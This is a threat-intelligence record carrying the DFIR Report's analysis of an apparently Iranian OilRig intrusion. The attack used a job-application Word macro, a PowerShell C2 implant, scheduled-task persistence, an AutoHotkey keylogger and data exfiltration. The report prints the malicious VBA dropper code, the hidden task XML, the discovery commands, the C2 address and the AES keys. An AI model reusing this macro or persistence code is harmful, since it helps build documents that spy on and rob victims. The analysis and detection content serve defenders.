{ "id": "63abef76-a80d-4e96-b178-4496aa54718f", "created_at": "2026-04-06T00:19:27.710538Z", "updated_at": "2026-04-10T03:37:36.753415Z", "deleted_at": null, "sha1_hash": "693e7f65b26b8441b3cbf4fa37ecec8a33c2be4a", "title": "Collect, Exfiltrate, Sleep, Repeat - The DFIR Report", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2302452, "plain_text": "Collect, Exfiltrate, Sleep, Repeat - The DFIR Report\r\nBy editor\r\nPublished: 2023-02-06 · Archived: 2026-04-05 20:17:07 UTC\r\nIn this intrusion from August 2022, we observed a compromise that was initiated with a Word document containing a\r\nmalicious VBA macro, which established persistence and communication to a command and control server (C2). Upon\r\nperforming initial discovery and user enumeration, the threat actor used AutoHotkey to launch a keylogger.\r\nAutoHotkey is an open-source scripting language for Microsoft Windows machines that was introduced to provide easy\r\nkeyboard shortcuts and automation. As described in AutoHotkey documentation, the AHK script can be executed in a\r\nnumber of ways. As observed in this intrusion, the adversary executed the AHK keylogger script by calling a renamed\r\nversion of AutoHotkey.exe (module.exe) and passing the script’s filename (module.ahk) as a command-line parameter.\r\nThe DFIR Report Services\r\nPrivate Threat Briefs: Over 20 private reports annually, such as this one but more concise and quickly published\r\npost-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking,\r\ndata clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for a demo!\r\nCase Summary\r\nThe intrusion began with the execution of a malicious macro within a Word document. The document was themed as a job\r\napplication for the firm Lumen. This tactic has been observed by many threat actor groups, including state sponsored actors\r\nin North Korea and Iran. Upon opening the file, the user was prompted to enable macros to complete the form, which began\r\nexecution of the malware.\r\nOnce executed, the macro created a VBS script (Updater.vbs), two PowerShell scripts (temp.ps1 and Script.ps1), and\r\ninstalled persistence through a scheduled task. The implant was fully implemented in PowerShell, which is uncommon\r\ncompared to many initial access tools today.\r\nFollowing the execution of the VBA embedded macros, the PowerShell script, Script.ps1, began to connect to the C2 server\r\nthrough an encrypted channel. Around a day after execution, the server became live and began sending instructions to the\r\nimplant. The instructions obtained from the server were then executed through the temp.ps1 PowerShell script.\r\nThe threat actors began executing basic discovery commands, all of which were executed via PowerShell cmdlets or built-in\r\nWindows utilities like whoami, net, time, tzutil and tracert; one exception to this was when the threat actors extracted a\r\nspecific function from the PowerSploit framework, Convert-LDAPProperty, to enumerate domain accounts in the\r\nenvironment. All data collected was then exfiltrated over the existing C2 channel.\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 1 of 24\n\nOn the fourth day of the intrusion, the threat actors became active again by dropping of a set of files that performed\r\nkeylogger functions. A scheduled task was then created to assist in execution of the keylogger. The keylogger itself was\r\ncomprised of an executable, module.exe, which was a renamed AutoHotkey binary. This would run the AutoHotkey script\r\nmodule.ahk. Additionally, a PowerShell script called readKey.ps1 would execute in the same task.\r\nOn the sixth day of the intrusion, the threat actors returned and collected the data compiled by the keylogger. This was\r\nperformed using the makecab.exe Windows utility to compress the keylogger files before exfiltrating them to the C2 server.\r\nThey then dropped another PowerShell script. This script would take a screenshot of the desktop of the infected host. After\r\nthis data was exfiltrated, the threat actors reviewed the antivirus service status and some additional host data.\r\nThe threat actors returned again on the seventh and ninth days to collect the keylogger data. The threat actors were not\r\nobserved performing any further actions before being evicted from the environment.\r\nOne interesting fact about this case is that the initial implant was fully implemented using PowerShell, and no executables\r\nwere dropped to the victim’s workstation for the implant. It’s also interesting to note that the PowerShell implant was and\r\nstayed fully undetectable for a significant period of time. This is contrary to many of our reported cases where the initial\r\naccess relies on initial access brokers and common malware used by those groups such as Emotet, IcedID, or Qbot.\r\nThe use of custom tailored malware points to a more targeted or discerning organization compared to the spray-and-pray\r\napproach performed by many access brokers. Reviewing the network traffic, we observed two signatures fire on the C2\r\ntraffic – ET MALWARE TA452 Related Backdoor Activity (GET)/(POST). TA452 is an activity group tracked by\r\nProofpoint that translates to the OilRig group. Under other classifications there is overlap with COBALT GYPSY, IRN2,\r\nAPT34, and Helix Kitten.\r\nOilrig is suspected of being an Iran based and state sponsored group. This group is widely credited with creating and\r\nutilizing various home grown PowerShell frameworks to perform their intrusions. Finally, analyzing the time of the threat\r\nactor hands on keyboard actions, the threat actors operated between Saturday and Thursday and no activity on Friday. All\r\nactivity took place place between 0300-1600 UTC which aligns with 0630-1930 (GMT +3:30) Tehran local time. All of\r\nthese factors together align to point to the Iranian Oilrig group as the likely threat actors behind this intrusion.\r\nTimeline\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 2 of 24\n\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 3 of 24\n\nAnalysis and reporting completed by @MittenSec, @MetallicHack and @0xtornado.\r\nInitial Access\r\nThe initial access used in this intrusion was a malicious word document dubbed “Apply Form.docm“. This document\r\npurported to be an application form for the technology and telecommunications company Lumen.\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 4 of 24\n\nThis was originally found and shared by @StopMalvertisin in a tweet detailing the lure and the payload. The precise\r\ndelivery method remains unknown as we do not have direct evidence on how this malicious document was delivered. We\r\nassert with a medium level of confidence, based on the previous similar reports, that those documents were likely delivered\r\nthrough spearphishing attachments in emails (T1566).\r\nExecution\r\nThis intrusion began with the execution of a malicious VBA macro embedded in a word document.\r\nA first look at “Apply Form.docm” with olevba.py, immediately highlights some suspicious behaviors.\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 5 of 24\n\nFirst off, the macro gets the name of the user executing the Word document and creates a directory in AppData, if it doesn’t\r\nexist:\r\nPrivate Sub Document_Open()\r\n Application.ScreenUpdating = False\r\n Call Macro1\r\n Dim Script, inp As String\r\n inp = Google.meet.Text\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 6 of 24\n\npla = Google.chat.Text\r\n uName = Environ(\"username\")\r\n Pathh = \"C:\\Users\\\" \u0026 uName \u0026 \"\\AppData\\Local\\Microsoft\\Windows\\Update\\\"\r\n If Dir(Pathh) = \"\" Then\r\n MkDir Pathh\r\n Call Macro2\r\n End If\r\nThe malicious VBA macro then created two PowerShell scripts and one VBScript file in “C:\\Users\\\r\n\u003cUSER\u003e\\AppData\\Local\\Microsoft\\Windows\\Update\\”\r\n Set FSO1 = CreateObject(\"Scripting.FileSystemObject\")\r\n SetAttr Pathh, vbHidden\r\n Set FS1 = FSO1.CreateTextFile(Pathh \u0026 \"Script.ps1\", True)\r\n ActiveDocument.Shapes.Range(Array(\"Text Box 19\")).Select\r\n Selection.WholeStory\r\n FS1.WriteLine Selection.Text\r\n FS1.Close\r\n Set FSO3 = CreateObject(\"Scripting.FileSystemObject\")\r\n Set FS3 = FSO3.CreateTextFile(Pathh \u0026 \"temp.ps1\", True)\r\n ActiveDocument.Shapes.Range(Array(\"Text Box 18\")).Select\r\n Selection.WholeStory\r\n FS3.WriteLine Selection.Text\r\n FS3.Close\r\n inp = Replace(inp, \"PATH\", Pathh)\r\n inp = EncodeBase65(inp)\r\n inp = Replace(inp, \"a\", \"@\")\r\n inp = Replace(inp, \"H\", \"-\")\r\n inp = Replace(inp, \"S\", \"$\")\r\n VBS = \"xxx = \"\"\" \u0026 inp \u0026 \"\"\"\" \u0026 vbNewLine \u0026 pla\r\n Set FSO2 = CreateObject(\"Scripting.FileSystemObject\")\r\n Set FS2 = FSO2.CreateTextFile(Pathh \u0026 \"Updater.vbs\", True)\r\n FS2.WriteLine VBS\r\n FS2.Close\r\n PNGenerator\r\n Application.ScreenUpdating = True\r\n ActiveDocument.Shapes.Range(Array(\"Text Box 9\")).Select\r\nEnd Sub\r\nWith Sysmon and FileCreate event 11, we can see that WINWORD.EXE successfully created these files:\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 7 of 24\n\nThen, in order to execute the script and install persistence, a new scheduled task was registered:\r\nPrivate Sub Document_Close()\r\n Application.ScreenUpdating = False\r\n uName = Environ(\"username\")\r\n Pathh = \"C:\\Users\\\" \u0026 uName \u0026 \"\\AppData\\Local\\Microsoft\\Windows\\Update\\\"\r\n XML = Google.map.Text\r\n XML = Replace(XML, \"PATH\", Pathh)\r\n Set service = CreateObject(\"Schedule.Service\")\r\n Call service.Connect\r\n Set rootFolder = service.GetFolder(\"\\\")\r\n temp = rootFolder.RegisterTask(\"WindowsUpdate\", XML, 6, , , 3)\r\n Call Macro4\r\nEnd Sub\r\nThe XML above describing the scheduled task was directly embedded in the VBA macro.\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cDescription\u003eThis task is used to start the Windows Update service when needed to perform scheduled operat\r\n \u003cURI\u003e\\WindowsUpdate\u003c/URI\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\n \u003cTimeTrigger\u003e\r\n \u003cRepetition\u003e\r\n \u003cInterval\u003ePT10M\u003c/Interval\u003e\r\n \u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n \u003c/Repetition\u003e\r\n \u003cStartBoundary\u003e2022-06-21T00:00:00\u003c/StartBoundary\u003e\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 8 of 24\n\n\u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cRandomDelay\u003ePT1M\u003c/RandomDelay\u003e\r\n \u003c/TimeTrigger\u003e\r\n \u003cIdleTrigger\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003c/IdleTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n \u003cPrincipal id=\"Author\"\u003e\r\n \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n \u003cRunLevel\u003eLeastPrivilege\u003c/RunLevel\u003e\r\n \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003etrue\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cDisallowStartOnRemoteAppSession\u003efalse\u003c/DisallowStartOnRemoteAppSession\u003e\r\n \u003cUseUnifiedSchedulingEngine\u003etrue\u003c/UseUnifiedSchedulingEngine\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003cRestartOnFailure\u003e\r\n \u003cInterval\u003ePT1M\u003c/Interval\u003e\r\n \u003cCount\u003e3\u003c/Count\u003e\r\n \u003c/RestartOnFailure\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003ewscript\u003c/Command\u003e\r\n \u003cArguments\u003e\"PATHUpdater.vbs\"\u003c/Arguments\u003e\r\n \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\nPersistence\r\nThe first scheduled task installed using the malicious VBA macro, executed a VBS script, which in turn executed a\r\nPowerShell script named Script.ps1.\r\nScript.ps1 contacts the C2 server and executed the base64 commands using temp.ps1.\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 9 of 24\n\nEvent 201 from Microsoft-Windows-TaskScheduler/Operational highlights the successful execution of this scheduled task.\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 10 of 24\n\nAnother scheduled task named MicrosoftEdgeUpdateTaskMachineUC was registered using schtasks.exe on the command\r\nline:\r\nThe scheduled task was then started manually:\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 11 of 24\n\nC:\\Windows\\system32\\schtasks.exe /run /tn MicrosoftEdgeUpdateTaskMachineUC\r\nThe scheduled task was designed to execute module.exe and a PowerShell script named readKey.ps1. These components\r\nwill be explained later in the collection section of this report.\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cDate\u003e2022-08-04T11:52:03.8083191\u003c/Date\u003e\r\n \u003cAuthor\u003eMicrosoft Inc.\u003c/Author\u003e\r\n \u003cURI\u003e\\masdfm\u003c/URI\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\n \u003cLogonTrigger\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003c/LogonTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n \u003cPrincipal id=\"Author\"\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n \u003cRunLevel\u003eLeastPrivilege\u003c/RunLevel\u003e\r\n \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003etrue\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003etrue\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003efalse\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT72H\u003c/ExecutionTimeLimit\u003e\r\n \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003e\"C:\\Users\\Public\\module\\module.exe\"\u003c/Command\u003e\r\n \u003cArguments\u003e\"C:\\Users\\Public\\module\\module.ahk\"\u003c/Arguments\u003e\r\n \u003c/Exec\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003epowershell\u003c/Command\u003e\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 12 of 24\n\n\u003cArguments\u003e-ep bypass -windowstyle hidden -f \"C:\\Users\\Public\\module\\readKey.ps1\"\u003c/Arguments\u003e\r\n \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\nDefense Evasion\r\nThe threat actor’s keylogger used in the intrusion implemented a XOR operation to encode the contents of data written to\r\nlogFileuyovaqv.bin.\r\nThe threat actor removed various files created by the discovery actions during the intrusion.\r\nRemove-Item \"C:\\Users\\REDACTED\\AppData\\Local\\Temp\\logFileuyovaqv.cab\"\r\nRemove-Item c:\\users\\public\\u.zip\r\nRemove-Item c:\\users\\public\\u.xml\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 13 of 24\n\nDiscovery\r\nMultiple discovery commands were executed by the threat actors. Each command was executed via the temp.ps1 file with\r\nthe input commands via base64 command line arguments.\r\nDuring the intrusion, the threat actors executed the following for discovery tasks.\r\nList disk information\r\n\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" logicaldisk\r\nList process\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -command Get-Process\r\nGet information about Windows Defender service\r\n\"C:\\Windows\\system32\\cmd.exe\" /c sc query WinDefend\r\nGet current time on the victim’s workstation\r\n\"C:\\Windows\\system32\\cmd.exe\" /c time\r\nGet time zone\r\n\"C:\\Windows\\system32\\cmd.exe\" /c tzutil /g\r\nUse TRACERT in order to discover network infrastructure\r\n\"C:\\Windows\\system32\\cmd.exe\" /c tracert 8.8.8.8\r\nEnumerate local accounts\r\n\"C:\\Windows\\system32\\net.exe\" accounts\r\nGet information on current user\r\n\"C:\\Windows\\system32\\whoami.exe\" /all\r\nEnumerate files\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 14 of 24\n\nget-childitem \"C:\\Program Files\" | out-string\r\nget-childitem \"C:\\Program Files (x86)\" | out-string\r\nget-childitem \"C:\\users\" | out-string\r\nGet-ChildItem \"C:\\users\\$env:username\\desktop\\\" | out-string\r\nGet-ChildItem \"C:\\users\\$env:username\\downloads\\\" | out-string\r\nGet-ChildItem \"C:\\users\\$env:username\\documents\\\" | out-string\r\nGet-ChildItem $env:LOCALAPPDATA | out-string\r\nget-childitem \"C:\\Program Files\" | out-string\r\nget-childitem C:\\ | out-string\r\nget-childitem C:\\users\\%username%\\downloads | out-string\r\nget-childitem C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default | out-string\r\nget-childitem C:\\Users\\$env:username\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default | out-string\r\nA PowerShell function based on the PowerSploit Convert-LDAPProperty code was used in order to retrieve information on\r\ndomain accounts:\r\nQuery AD \u0026 SAM account name\r\n$s = new-object -typename system.directoryservices.directorysearcher\r\n$s.PageSize = 999999999\r\n$s.Filter = '(\u0026(objectclass=computer))'\r\n$s.findall() | % {$_.properties.samaccountname; $_.properties.operatingsystem}\r\nComputer and network information discovery\r\nGet-ComputerInfo | out-string\r\nGet-NetTCPConnection | out-string\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 15 of 24\n\nGet-NetIPConfiguration -All | Out-String\r\nGet the account information for logged-on user of a Windows machine\r\nGet-WmiObject –ComputerName [REDACTED] –Class Win32_ComputerSystem | Select-Object UserName\r\nGets the status of antimalware software on the computer.\r\nGet-MpComputerStatus\r\nList environment variables\r\nls $env:temp\r\nget-childitem $env:temp | out-string\r\nGet public IP address\r\nInvoke-WebRequest -UseBasicParsing -Uri http://ident.me | out-string\r\nCollection\r\nBefore exfiltration, the data collected from LDAP discovery was written out to an XML file. \r\nCompress-Archive -Path c:\\users\\public\\u.xml -DestinationPath c:\\users\\public\\u.zip -CompressionLevel Optimal\r\nThreat actors also dropped and executed a PowerShell script using their temp.ps1 C2 script:\r\nThe sc.ps1 file contained PowerShell code to capture a screenshot of the system. The screenshots were taken upon the\r\nexecution of this PowerShell script and then they were saved in the same directory as sc.png files.\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 16 of 24\n\nA scheduled task named MicrosoftEdgeUpdateTaskMachineUC was created by the threat actors. The program executed by\r\nthis task was a keylogger. This keylogger relied on the files module.exe, module.ahk, and readkey.ps1. The file t.xml\r\ncontained the task used to execute these files.\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 17 of 24\n\nThe executable, module.exe, is a renamed binary of AutoHotkey. This is one of the ways in which you can execute an\r\nAutoHotkey (AHK) script.\r\nThe actual keylogger is the AHK script, module.ahk.\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 18 of 24\n\nNavigating through the AHK script, we discovered artifacts of acquiring the keyboard layout and capturing pressed keys. In\r\naddition, we notice there is a function named UpdateReg that accepts a text parameter. This registry key is also found\r\nwithin the readkey.ps1 script and turns out to be where the keylogger saved captured keystrokes.\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 19 of 24\n\nThe readkey.ps1 file grabbed the keystrokes from the KeypressValue registry key, XOR’s the data, and saves it to a log\r\n(logFileuyovaqv.bin) file.\r\nThe threat actors then made a cab file out of the collected keystrokes in preparation for exfiltration.\r\nmakecab \"C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\logFileuyovaqv.bin\" C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\log\r\nCommand and Control\r\nActivity to the C2 is established via execution of the Script.ps1 and temp.ps1 files. Communication between the victim and\r\nC2 is encrypted using AES-CBC with the following Key and IV:\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 20 of 24\n\nKey 17 1d 84 e8 41 ae e4 c0 ff fb a2 7c 86 d1 ec 82 b8 80 7c b8 c3 79 9a 11 b8 fa 2d b7 78 1f d1 5a\r\nIV 18 3c ed 6f b3 34 9f 9a c6 f9 08 f9 29 de 35 52\r\nFirst communication to the C2 (hxxp[:]//45[.]89[.]125[.]189/get) began on day one and beaconed in roughly 10-minute\r\nincrements. All requests return a 502 Bad Gateway error until day two.\r\nFirst C2 communication breakdown:\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 21 of 24\n\nAES encrypted PowerShell command example:\r\n0!@#EWQ654!@#EWQpowershell -command Get-Process^%$RTY:\r\nSafeBreach published similar findings from this C2 infrastructure, where they described the format in detail. You can review\r\ntheir research here.\r\nExfiltration\r\nSeveral files collected during discovery tasks, such as domain user account information and later the keylogger collected\r\ndata, were exfiltrated to the C2 server via POST requests.\r\nImpact\r\nDuring the intrusion, no final actions beyond data collection and discovery tasks were observed.\r\nIndicators\r\nAtomic\r\n45.89.125.189\r\nhttp://45.89.125[.]189/get\r\nhttp://45.89.125[.]189/put\r\nComputed\r\nt.xml\r\n691332c86dd568f87b7fff4601c37895\r\n0b676ea2ad205b70b9feb1eedbfdec72137e08e5\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 22 of 24\n\n7ae52c0562755f909d5d79c81bb99ee2403f2c2ee4d53fd1ba7692c8053a63f6\r\nreadkey.ps1\r\nfc5f490dbe375779b2c6bbccdd869ca6\r\nb8c8171b6e8efd2bb0ae8d5b22749564edd38109\r\neb2a94ee29d902c8a13571ea472c80f05cfab8ba4ef80d92e333372f4c7191f4\r\nmodule.exe\r\n9a7d5f126904adc194df4dcbc2c5715c\r\na86088cf31c72cc4648ee8dfa082979a74044203\r\nb92be3d086372fc89b3466e8d9707de78a5b6dff3e4a2eecc92c01d55a86fd7d\r\nmodule.ahk\r\nc65b10c1113c0f0d4e06609fa60d9aad\r\n2ca263fc5f1e505c1839ab0abf56571af6c7809d\r\ne4b2411286d32e6c6d3d7abffc70d296c814e837ef14f096c829bf07edd45180\r\nApply_Form.docm\r\nf769f67681707e8f69ecdf9e62fb944c\r\nc5f6a48fa52a279e1f3424b97662b479716229af\r\n45f293b1b5a4aaec48ac943696302bac9c893867f1fc282e85ed8341dd2f0f50\r\nsc.ps1\r\n34a2677a7776f87e810814c2d3845f47\r\n79b1f6b0afe943a60560eb20677d5b801dc29ba3\r\nac933ffc337d13b276e6034d26cdec836f03d90cb6ac7af6e11c045eeae8cc05\r\nlogFileuyovaqv.bin\r\nf7611e77c5f99b81085e61b17b969afe\r\n475320a5bf0ba52fc9ff711d8e6dba512b3fefbf\r\nd4857156094963c8e38f6e88f4d72cb910aa537e3811eae0579f7abc568c9ae8\r\nUpdater.vbs\r\n850b8d07180601417193a6f88227130a\r\ne1f4a8e434638c56b7a0d2d0317f4d0d84987a40\r\nbe0e75d50565506baa1ce24301b702989ebe244b3a1d248ee5ea499ba812d698\r\ntemp.ps1\r\nc3aedb781a5b96674764cd43ef076d10\r\n86da0100bb6a07a89eaa4dc3ec220e9dbd6ecf71\r\n16007ea6ae7ce797451baec2132e30564a29ee0bf8a8f05828ad2289b3690f55\r\nScript.ps1\r\na3c14604fb4454ba5722f07f89780e73\r\ned7b9ddbaee794cecb80fac794b0e6cb0ae073b5\r\nbda4484bb6325dfccaa464c2007a8f20130f0cf359a7f79e14feeab3f\r\nDetections\r\nNetwork\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 23 of 24\n\nET MALWARE TA452 Related Backdoor Activity (POST)\r\nET MALWARE TA452 Related Backdoor Activity (GET)\r\nET INFO Windows Powershell User-Agent Usage\r\nSigma\r\nhttps://github.com/The-DFIR-Report/Sigma-Rules/blob/main/rules/windows/process_creation/proc_creation_win_renamed_autohotkey_binary.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.ym\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/17333/17333.yar\r\nMITRE\r\nPowerShell – T1059.001\r\nMalicious File – T1204.002\r\nDomain Account – T1087.002\r\nSystem Information Discovery – T1082\r\nProcess Discovery – T1057\r\nSystem Owner/User Discovery – T1033\r\nSystem Network Connections Discovery – T1049\r\nScheduled Task/Job – T1053\r\nScreen Capture – T1113\r\nKeylogging – T1056.001\r\nSymmetric Cryptography – T1573.001\r\nArchive via Utility – T1560.001\r\nSecurity Software Discovery – T1518.001\r\nFile and Directory Discovery – T1083\r\nSystem Time Discovery – T1124\r\nSystem Service Discovery – T1007\r\nModify Registry – T1112\r\nInternal case #17333\r\nSource: https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 24 of 24\n\nThe first scheduled PowerShell script task installed using named Script.ps1. the malicious VBA macro, executed a VBS script, which in turn executed a\nScript.ps1 contacts the C2 server and executed the base64 commands using temp.ps1.\n Page 9 of 24", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/" ], "report_names": [ "collect-exfiltrate-sleep-repeat" ], "threat_actors": [ { "id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4", "created_at": "2022-10-25T15:50:23.458833Z", "updated_at": "2026-04-10T02:00:05.419537Z", "deleted_at": null, "main_name": "APT34", "aliases": null, "source_name": "MITRE:APT34", "tools": [ "netstat", "Systeminfo", "PsExec", "SEASHARPEE", "Tasklist", "Mimikatz", "POWRUNER", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b", "created_at": "2025-08-07T02:03:24.722093Z", "updated_at": "2026-04-10T02:00:03.681914Z", "deleted_at": null, "main_name": "COBALT EDGEWATER", "aliases": [ "APT34 ", "Cold River ", "DNSpionage " ], "source_name": "Secureworks:COBALT EDGEWATER", "tools": [ "AgentDrable", "DNSpionage", "Karkoff", 